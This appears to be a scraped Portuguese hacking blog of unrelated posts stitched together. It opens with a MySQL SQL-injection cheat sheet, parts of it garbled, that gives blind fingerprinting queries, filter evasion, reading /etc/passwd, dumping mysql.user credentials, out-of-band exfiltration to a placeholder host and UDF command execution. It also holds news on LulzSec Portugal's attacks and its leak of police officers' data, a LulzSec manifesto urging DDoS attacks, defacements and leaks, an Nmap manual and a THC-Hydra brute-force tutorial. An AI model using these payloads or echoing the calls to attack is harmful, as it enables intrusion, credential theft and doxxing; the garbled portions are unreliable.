MySQL Cheat Sheet

SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir
Current Database:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!
#Stacks the row "foo" from the table "bar" together, using the separator "

#Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT.
#The 1024 byte limit is stored in the @@group_concat_max_len variable.
') FROM bar
#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT().
#Which therefor allows you to concat strings together up to the @@max_allowed_packet size,
#instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1)))
Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation.
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test".
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test".
Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
SELECT Without Dublicates:
Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar".
Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user
Get MySQL Users:
SELECT user FROM mysql.user
Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges
Get MySQL User Privileges on Different Databases:
SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges

Get MySQL User Privileges on Different Columns:

SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges
Get MySQL User Credentials & Privileges:
SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv,
Repl_client_priv) FROM mysql.user
Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER'
SELECT host,user FROM mysql.user WHERE Super_priv='Y'
Get Databases:
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables
Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.columns
Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.columns
SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
SELECT foo FROM bar LIMIT N,1; #Returns row N.
Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" for 10000 times.
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
Conversion (Casting):
SELECT CAST('65' AS CHAR); #Returns: A
SELECT SUBSTR('foobar',1,3); #Returns: foo
Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :
ASCII to Number:
SELECT ASCII('A'); #Returns: 65

Number to ASCII:

SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test
If Statement:
#Returns 1 if the database is running MySQL 5.
#Returns 1 if the database is running MySQL 4.
Case Statement:
#Returns 1 if the database is running MySQL 5.
#Returns 1 if the database is running MySQL 4.
Read File(s):
#Requires you to have the File_priv in mysql.user. On error this statement will return NULL.
SELECT LOAD_FILE('/etc/passwd')
Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
Logical Operator(s):
AND, &&; #The AND operator have && as an alternative syntax.
OR, ||;  #The OR operator have || as an alternative syntax.
NOT, !; #The NOT operator have ! as an alternative syntax.
XOR; #The XOR operator got no alternative syntax.
Fuzzy Code Comment:
#Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion.
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar; Batched query with additional NULL-byte. It do not work together with PHP though.
A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carrier Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.

Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parenthesis, ( and ); #Can also be used as separators when used right.
Parenthesis instead of space:
#As said two lines above, the use of parenthesis can be used as a separator.
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation.
DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_as.txt’
Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA.
#It can be done if you're able to upload a shared object into /usr/lib.
#The file extension is .so, and it must contain an "User Defined Function", UDF.
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU Architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_machine;
A couple of useful blind queries to fingerprint the database.
All of these return either True or False, as in, you either get a result or you don't.
Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1
Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE
LIMIT 0,1)=CHAR(89),1,0)=1
Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE
LIMIT 0,1)=CHAR(89),1,0)=1
Can MySQL Sleep:
#This query will return True and should take above 1 second to execute. If it's a success.
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1
Do a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0

Do a certain table exist:

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
Do a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0


Anonymous - Mensagem ao Mundo 12/02/2011


Piratas ‘apagam’ Parlamento da net

O grupo LulzSec Portugal, piratas informáticos que desde 15 de Outubro já atacaram, entre outros, os sites do Ministério da Administração Interna e das Finanças, de forças e serviços de segurança como a PSP e o SIS, além dos partidos políticos PSD, CDS, PS, provocaram ontem, às 20h00, um apagão de mais de vinte minutos no portal oficial da Assembleia da República.

Os hackers, que decidiram invadir sistemas informáticos estatais como forma de contestação ao Governo, já estão a ser investigados pela Polícia Judiciária de Lisboa, apurou o CM.
Os inquéritos estão a correr na Secção de Investigação a Crimes Informáticos e Tecnológicos – e têm por objectivo caçar os piratas, que se intitulam portugueses mas contam com o apoio de hackers estrangeiros. O objectivo é dirigir os ataques a partir de servidores fora do País, de forma a dificultar o trabalho da PJ na sua localização.
O caso considerado mais grave até ao momento, ao não ter passado pelo simples bloqueio de sites, diz respeito ao roubo de dados sobre a identificação de 107 agentes da PSP, colocados em três esquadras da 2ª divisão, em Chelas. Os piratas entraram nos servidores do Sindicato Nacional da Carreira de Chefes da PSP e, a partir daí, expuseram anteontem as identidades, patentes, números de telefone e endereços electrónicos dos polícias através da rede social Twitter.
Os investigadores da PJ, nos inquéritos que estão sob direcção da 9ª secção do DIAP de Lisboa, temem que já tenha sido violada informação privilegiada noutros organismos do Estado – que podem não ter acautelado de forma prévia os seus sistemas de segurança informática. Está ainda por apurar a dimensão dos prejuízos causados, por exemplo, no Ministério da Administração Interna.
Para Paulo Rodrigues, presidente da Associação Sindical dos Profissionais da Polícia, o ‘roubo’ de dados de 107 agentes da PSP de Chelas "é um caso preocupante que mostra como é preciso ter mais cuidado com as redes sociais". Ainda assim, o responsável desvaloriza a relevância dos dados revelados: "Não põem em risco os visados, mas provoca uma situação de desconforto e a fragilização dos contactos pessoais". O sindicato a que preside retirou o seu site da net.
O diretor nacional da PSP defendeu ontem que a violação e divulgação de dados pessoais de polícias é "grave", mas que o papel da PSP passará apenas por colaborar com a PJ, responsável pela investigação ao caso. Em relação aos incidentes junto à Assembleia da República, dia 24, Guedes da Silva lamentou o facto de ninguém se ter preocupado com o agente agredido. "Perguntaram o que aconteceu ao alemão, mas ninguém perguntou como está o polícia. Desmaiou depois de lhe baterem com a cabeça contra uma parede. Está em casa, de baixa", disse. 

Fonte : Publico


Site do Parlamento em baixo na sequência de ataque

O site do Parlamento ficou inacessível, pouco tempo depois de o grupo LulzSec Portugal ter anunciado no Twitter que este seria o próximo alvo de um ataque.

Os hackers usaram um ataque distribuído de negação de serviço, que bombardeia o site com um grande volume de pedidos de acesso, até que este não consegue responder.

Segundo uma mensagem no Twitter, publicada às 19h56, os atacantes usaram uma aplicação informática chamada Low Orbit Ion Cannon, que é frequentemente usada neste género de ataques. Quanto mais pessoas participarem no ataque, mas eficaz este é.

Oito minutos depois de a mensagem a apelar ao ataque ter sido publicada, os LulzSec Portugal indicavam que o site tinha cedido.

Perto das 23h, o site Parlamento.pt estava disponível de forma intermitente, embora com um acesso mais lento do que o habitual e a falhar em algumas tentativas de carregamento.

O grupo LulzSec Portugal, inspirado num grupo homónimo internacional, apelou hoje a que outros hackers se juntassem numa operação de ataques e de divulgação de informação com início marcado para 1 de Dezembro.
Fonte : Publico

Hackers divulgam dados pessoais de 107 polícias de Lisboa e ameaçam toda a PSP

Um grupo intitulado Lulzsec Portugal terá acedido ilegalmente aos computadores do Ministério da Administração Interna (MAI), copiado e divulgado os dados pessoais de mais de uma centena de efectivos da PSP a trabalharem em três esquadras de Lisboa. Num texto resumido, acompanhado do endereço onde os dados pessoais podem ser consultados, os hackers ameaçam vir a divulgar os elementos de todo o efectivo da PSP, argumentando que tal acontece como represália pelos actos de violência que terão sido praticados contra pessoas que, no dia 24, participaram, em frente à Assembleia da República, no protesto da greve geral.

Os dados pessoais (nome, posto, número de identificação, local de trabalho e cargo desempenhado, número de telefone e contacto e-mail) de 107 polícias começaram a ser divulgados na noite de domingo. Ontem de manhã muitos polícias contactados pelo PÚBLICO, incluindo diversos sindicatos, desconheciam a eventual intromissão e violação da Rede Nacional de Segurança de Segurança Interna, sistema no qual se incluem ainda os dados pessoais de outras forças tuteladas pelo MAI, nomeadamente a GNR e os bombeiros. Feito o contacto telefónico para a assessoria de imprensa do ministério, não foi negada a quebra de segurança, mas recusaram fazer qualquer comentário sobre a situação.

No curto texto do Lulzsec Portugal é dito: "Em resposta às detenções e violência sobre civis desarmados iremos divulgar os dados de todos os agentes da PSP, esquadra a esquadra, indivíduo a indivíduo, a começar pela esquadra de Chelas". Para Hélder Andrade, presidente da Associação Sindical dos Oficiais da Polícia (ASOP), o texto em causa é motivo mais que suficiente para "pedir esclarecimentos à Direcção Nacional [da PSP]".

"O que posso adiantar é que esse pedido de esclarecimentos já está a ser encaminhado e que a Direcção Nacional, tendo sabido desde ontem [domingo] à noite do que se passava, terá pedido a todo o efectivo para ter especiais cuidados na abordagem deste problema", adiantou ainda o presidente da ASOP. Se Hélder Andrade tinha, de algum modo, informação relativa à quebra no sistema de segurança, o mesmo já não se passava com, pelo menos, mais quatro presidentes de outros tantos sindicatos policiais. Paulo Rodrigues, em representação da ASPP, Armando Ferreira, do Sinapol, Peixoto Rodrigues, do SUP, e António Ramos, do SPP, negaram todos, quando contactados pelo PÚBLICO, ter conhecimento da situação. "Não sabia. A confirmar-se só significa que o sistema informático é frágil", referiu Peixoto Rodrigues, enquanto que Armando Ferreira salientou "o perigo" que representa "uma tão grave falha na Rede Nacional de Segurança Interna". Todos os quatro presidentes manifestaram, entretanto, a intenção de questionarem a Direcção Nacional e o MAI acerca da ocorrência.

O PÚBLICO contactou ainda, telefonicamente, diversos polícias cujos nomes constam da lista de 107 agora divulgada. A maior parte não quis tecer qualquer comentário para a imprensa, enquantos outros, embora solicitando o anonimato, lamentaram a quebra no sistema, a qual poderá conduzir, dizem, a "situações perigosas". A maior parte dos polícias contactados (desde os que ocupam cargos de chefia até aos agentes que fazem serviço fardado nas ruas de Chelas e os que fazem notificações judiciais) entende que os esclarecimentos sobre a falha na segurança competem "à Direcção Nacional e ao MAI, que estão a investigar". Também a Direcção Nacional foi contactada, sem que tivesse prestado qualquer esclarecimento em tempo útil.

Os dados pessoais revelados dizem respeito a polícias da 14.ª esquadra, na Via Principal de Peões, da 16.ª esquadra, na Avenida João Paulo II, Zona J, e da 38.ª esquadra, na Rua Ricardo Ornelas, Lote 378 R/C A, Zona 1, em Chelas. Este bairro, integrado na 2.ª Divisão da PSP de Lisboa, é considerado um dos mais violentos do país.

15 de Outubro culpa polícias e Governo

O movimento 15 de Outubro, especialmente activo durante os protestos em frente à Assembleia da República, no dia 24, acusou ontem o Governo de estar "a criar uma narrativa de violência" uma vez que terá "empolado acontecimentos minúsculos" e quis "destruir a greve geral e dividir a conjugação de esforços criada". Em declarações ao PÚBLICO, o activista João Camargo não só endereçou responsabilidades ao Governo como disse ter provas (imagens) de polícias trajando à civil que durante a concentração fizeram incitamentos à revolta e que, posteriormente, reprimiram os manifestantes com violência.

Fonte : Publico

Como um Utilizador de Linux vê o Windows

1. Q: What did the Ivy League graduate student do after reading a box that said "Windows Vista or better"
    A: He installed Linux!

2. Linux, DOS, Vista -- The Good, the Bad, and the Ugly

3. Failure is not an option -- it comes bundled with Windows.

4. Microsoft gives you Windows... Linux gives you the whole house.

5. Microsoft is not the answer. Microsoft is the question. Linux is the answer.

6. Macs are for those who don't want to know why their computer works.

    Linux is for those who want to know why their computer works.

    DOS is for those who want to know why their computer doesn't work.

    Windows is for those who don't want to know why their computer doesn't work.

7. Q: How many Microsoft engineers do you need to replace a broken light-bulb?
    A: None, Microsoft will standardize the darkness in such cases!

8. Being a Linux user is sort of like living in a house inhabited by a large family of carpenters and architects.         Every morning when you wake up, the house is a little different. Maybe there is a new doors, or some walls have moved. Or perhaps someone has temporarily removed the floor under your bed...

9. Never go for Windows airlines. When you are in situation to open your parachute, you will get a message   "Do you wish to open the parachute? Yes No".
Are you sure? Yes/No.
Parachute needs permission to continue. Allow/Ignore/Cancel.

10. After a long night, Bill Gates and his wife woke up with smiles on their faces. His wife remarked: "Oh Bill! Now I know why you named your company MICRO-SOFT!"


LulzSecPortugal/Anonymous | Operação #AntiSecPT

Operação #AntiSecPT – dia 1 de Dezembro Hackers Portugueses unem-se Online para apoiar os ativistas Legais e Pacificos ANONYMOUS Portugal e todos os movimentos contra a corrupção.

Olá, mundo.
LulzSecPortugal dá início dia 1 de Dezembro à Operação #AntiSec em Portugal.
Viemos das AnonOps e acreditamos no movimento #AntiSec de corpo e alma. estamos aqui para combater a corrupção, expondo online a
transparência que este sistema não permite existir.. e este sistema está a falhar.
O povo português saiu à rua dia 15 de Outubro pacificamente, e só houve distúrbios por parte de cerca de 4 Agentes Provocadores, em que a polícia assistiu a sua retirada discreta do local.
No dia 24 de Novembro, #AntiSec saiu à rua e fez o reconhecimento a mais de 50 Agentes Provocadores Organizados, a tentar causar o caos.
houve denúncias e houve testemunhas que presenciaram agentes policiais à paisana a agredir e a prender injustamente um jovem, mas
as inter-redes não ficaram em silêncio.
Iremos denunciar os chefes policiais que obrigam a polícia no terreno a agredir os seus irmãos e irmãs que protestam pacificamente.
Ao mesmo tempo condecoramos os agentes policiais que mantêm a paz ao desobedecerem às ordens violentas e injustas que lhes são dadas.
Convidamos os Anonymous com conhecimentos de informática a afastarem se das manifestações e a juntarem se a nós para uma ‘desobediência civil’ online de modo a afastar os nossos atos, da ideia de Revolução Global Pacifica que os Anonymous Portugueses representam e apoiam.
Apelamos aos auto-didatas, e hackers a espalharem pelo nosso país, assinando anonimamente em nome do movimento #AntiSecPT, em defacements, ataques DDOS e leaks, que exponham online a corrupção.
Apelamos que seja espalhado em graffitis pelas paredes, pela musica, por vídeos e textos o combate à corrupção em nome do movimento #AntiSecPT.
Apelamos aos agentes de autoridade, agentes dos serviços secretos, aos militares e a todos os portugueses que têm acesso a informação que possa denunciar corrupção no nosso país a enviar nos um e-mail, ou um alvo, para podermos divulgar anónimamente essa informação.
Apelamos ao povo Português e aos movimentos ativistas para registarem em fotos e vídeos, TODOS os acontecimentos em manifestações, de modo a que nós possamos trabalhar online.
2011 é o ano das revoluções e dos maiores hacks da história (até ao momento..) e estamos a criar um caminho para a revolução global. vamos defender o povo da corrupção policial e expor os corruptos que criaram a crise neste sistema com interesses sombrios.
Iremos também apoiar todos os movimentos que apresentam soluções concretas para substituir este sistema corrupto.
Denunciem a corrupção pelo nosso e mail, e juntem-se a nós no IRC.
Não somos Anonymous. Nem somos LulSecPortugal.
Somos o movimento #AntiSecPT
Somos os 99 por cento.
Não esquecemos, nem perdoamos corruptos.


Iniciação a Redes

  • Introdução as Redes
  • Topologia de Rede
  • Transmissão de Dados na Rede
  • MAC Address
  • Unicast
  • MultiCast
  • Lista de Endereçamento IP MultiCast
  • BroadCast de rede
  • Controlar MultiCast e BroadCast
  • Hubs & Repetidores
  • Switches & Bridges

Free CCNA WorkBook

Matthew George disponibiliza cerca de 100 laboratórios para rodar no GNS3 e mais de 50 videos sobre os assuntos cobrados no exame CCNA 640-802.

Para aqueles que querem sugestoes de labs para rodar no GNS3 e estao se preparando para prestar o exame CCNA, alem dos labs e videos gratuitos, estao disponiveis para download a topologia LAN e WAN usadas nos laboratórios do site.


Como Identificar um Geek

A partir de hoje, vamos ver e falar deste tema que foi realmente um "BOOM" na última década. O orgulho Nerd. Antes os Nerds eram estereotipados por serem mais intelectuais que a média, estes buscavam exercer atividades inadequadas a sua idade, prejudicando outras atividades mais populares, ou seja, a socialização do indivídio. Considerados solitários por ter somente uma amizade, o conhecimento. 

Muitas vezes desajeitado e com forte interesse em tecnologia, os nerds gostam de coisas que geralmente as pessoas "normais" não gostam, como animes, ficção científica, UFO e etc.

A diferença é que com o tempo, os nerds foram se consertando, socializando entre iguais. Como eventos de animes, Star Trek, Star Wars e etc. Foram se desenvolvendo até se tornarem o que chamamos hoje de Geek. Os geeks são nada mais que nerds com amigos, amigos geeks a propósito. Eles agora estão sociáveis e geralmente são aceitáveis por outras pessoas diferentes. Geeks geralmente andam juntos e são frequentemente vistos em rodas de amigos conversando sobre RPG, o último mangá de bleach ou se o 3º filme de Star Wars foi bom ou  não. Os assuntos variam muito, a maior característica do Geek é se informar sobre várias coisas (geralmente inúteis) para sempre ter uma opinião formada quando está com outros amigos. Se aquele geek está calado no meio da conversa, pode ter certeza que da próxima vez ele terá o que falar.

A grande diferença de um Nerd e um Geek, além deste ter amigos, é que o Geek é um especialista. O nerd gosta de ler e saber de tudo um pouco para aplicá-lo, o Geek por puro prazer de saber. Todo Geek porém, é especialista em algo que os diferenciam de outros geeks. Como um geek de computadores, um geek de jogos MMORPG, um geek de filmes, um geek de jogos eletrônicos, um geek colecionador de action figures e etc. Todo geek especialista é visto como referência naquele assunto entre seus amigos.

O geek também melhorou seu modo de vestir. Antes os nerds eram deprimentes, vestindo roupas avançadas a sua idade, e tinham uma aparência bem insegura. Hoje os geeks ou vestem roupas padrões para todos identificá-lo como geek (como a camisa de darth vader, flash, lanterna verde, bandas, camisa xadrez & óculos quadrados & jeans & all star) ou inventam moda, sendo originais, criando as próprias roupas ou vestindo a mesma camisa do personagem favorito.

Cabelos assanhados, óculos quadrado, camisa xadrez, jeans e provável all star - geek padrão
Não sei poque nós nos sentimos atraídos por isso
E para continuar, vou colocar de vez em quando algumas fotos para vocês identificarem geeks por aí.
Começando com essa aqui:

O que ele deve ter pensado: "O mundo tá acabando, eu posso morrer queimado, mas NÃO VO DEIXAR DE JOGAR WOW HOJE! Tenho que arranjar um monitor urgente!"
Taí um geek que ama seu computador huashuashua. NERD PRIDE APROVADO!

Pra finalizar, eu, um geek de star wars, filmes, games e blogs, deixo esse botão do "Não" mais memorável da história do cinema, para vocês apertarem quando acharem que precisam^^

Para refletir "Todo Geek é um Nerd, mas nem todo Nerd é um Geek"

CCNA em 31 Dias

Este livro é propõem abordar todos os tópicos necessarios para validar a prova de certificação CCNA 640-802 em 31 dias. Apesar de ser um livro muito bom e bastante completo, não e aconselhado para quem não tem conhecimentos prévios de Redes Cisco, considero este livro óptimo para quem já marcou exame e esta na sua recta final dos estudos para a certificação CCNA.

Tópicos de Estudo Divididos por dia:

31 Network Devices, Components, and Diagrams
30 Network Models and Applications
29 Network Data Flow from End-to-End
28 Connecting Switches and Ethernet Technology
27 Network Segmentation and Switching Concepts
26 Basic Switch Configuration and Port Security
25 Verifying and Troubleshooting Basic Switch Configurations
24 Switching Technologies and VLAN Concepts
23 VLAN and Trunking Configuration and Troubleshooting
22 VTP and InterVLAN Routing Configuration and Troubleshooting
21 IPv4 Address Subnetting
20 Host Addressing, DHCP, and DNS
19 Basic IPv6 Concepts
18 Basic Routing Concepts
17 Connecting and Booting Routers
16 Basic Router Configuration and Verification
15 Managing Cisco IOS and Configuration Files
14 Static, Default, and RIP Routing
13 EIGRP Routing
12 OSPF Routing
11 Troubleshooting Routing
10 Wireless Standards, Components, and Security
9 Configuring and Troubleshooting Wireless Networks
8 Mitigating Security Threats and Best Practices
7 ACL Concepts and Configurations
6 Verifying and Troubleshooting ACL Implementations
5 NAT Concepts, Configuration, and Troubleshooting
4 WAN and VPN Technologies
3 PPP Configuration and Troubleshooting
2 Frame Relay Configuration and Troubleshooting
1 CCNA Skills Review and Practice

Controlo da População?

Cisco - Virtual Security Gateway

Ajude a Parar a Censura Na Internet

Que Percurso Cisco seguir?

Esta imagem apresenta os vários caminhos de certificação Cisco, existem 7 tipos de carreiras que podemos optar ou então conjugar grande parte delas. Para perceber melhor o que cada uma delas representa, utilize a aplicação em Flash disponibilizada pela Cisco : 

Manual Nmap

O Nmap e um dos scanners de portas mais utilizado mundialmente, actualmente è suportado em vários sistemas operativos. O Nmap usa o protocolo IP para descobrir que hosts estão activos na rede interna ou externa, podemos também podemos identificar o sistema operativo, serviços, versão dos serviços, portas abertas, filtros da firewall, algumas vulnerabilidades, etc... Todos os scans realizados podem ser exportados em vários formatos de forma a permitir serem usados por outros programas para gerir a rede ou por programas de identificação de vulnerabilidades como o Nessus ou OpanVas...

Neste manual vou tentar dar exemplos de grande parte da sintaxe do nmap ou explicar alguns dos parâmetros mais utilizados...

Inicio Sintaxe

Nmap 5.35DC1 ( http://nmap.org )

Usage: nmap [Scan Type(s)] [Options] {target specification}


Ex: scanme.nmap.org, microsoft.com/24,; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file

-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host

-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sO: IP protocol scan
-b : FTP bounce scan

-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than

-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.

-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
Options which take

Descobrir Sistema operativo remoto, portas abertas e versão dos serviços.
Comando: nmap -O -sV

//Resultado Nmap
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-04-09 17:06 WEST
Nmap scan report for
Host is up (0.00039s latency).
Not shown: 995 closed ports
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:EF:60:B3 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Network Distance: 1 hop
Service Info: OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds


-O procura pelo sistema operativo utilizado;
-sV procura pelos serviços que estão a correr em determinada porta e qual a versao;

Mais opções que podiam ser utilizadas para procurar mais detalhadamente a versão de cada serviço:
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)

Procurar hosts activos em toda rede interna, rede classe C:

Comando: nmap

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-04-09 17:37 WEST
Nmap scan report for
Host is up (0.0092s latency).
Not shown: 996 filtered ports
23/tcp closed telnet
80/tcp open http
443/tcp open https
8080/tcp closed http-proxy
MAC Address: 00:3F:33:BF:F2:1F (Netgear)

Nmap scan report for
Host is up (0.014s latency).
All 1000 scanned ports on are closed
MAC Address: 01:24:9D:5E:BE:FE (Sony Computer Entertainment)

Nmap scan report for
Host is up (0.011s latency).
Not shown: 991 filtered ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
3390/tcp open unknown
5357/tcp open unknown
10243/tcp open unknown
49157/tcp open unknown
MAC Address: 01:2F:2B:2B:ED:5F (Hon Hai Precision Ind.Co.)

Nmap scan report for
Host is up (0.000025s latency).
All 1000 scanned ports on are closed

Nmap scan report for
Host is up (0.00097s latency).
Not shown: 995 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:0C:29:EF:60:B3 (VMware)

Nmap done: 256 IP addresses (5 hosts up) scanned in 14.87 seconds

Manual THC-Hydra


Autor : MrTcp

O THC-Hydra é uma ferramenta para ataques de força-bruta (brute-force) para vários protocolos de rede actualmente são suportados os protocolos listados em baixo, neste tutorial não vamos abordar todos os protocolos , futuramente vamos falar sobre cada um deles;

ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,LDAP2, Cisco AAA

Neste tutorial vamos utilizar o THC-Hydra para descobrir senhas dos seguintes protocolos: pop3, FTP, Telnet e SMB, todos os ataques vão ser realizados em maquinas virtuais dentro da minha rede e todas as passwords vão ser previamente definidas no dicionário a utilizar;

Ip do Servidor :
Ip Local :
Utilizador: MrTcp
Email – MrTcp-teste[at]live.com.pt
Password - *****


 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

  -R        #Restaura uma sessão abortada;

  -S        #Conecta via SSL

  -s           porta    #Se o serviço estiver a correr numa porta diferente definir aqui

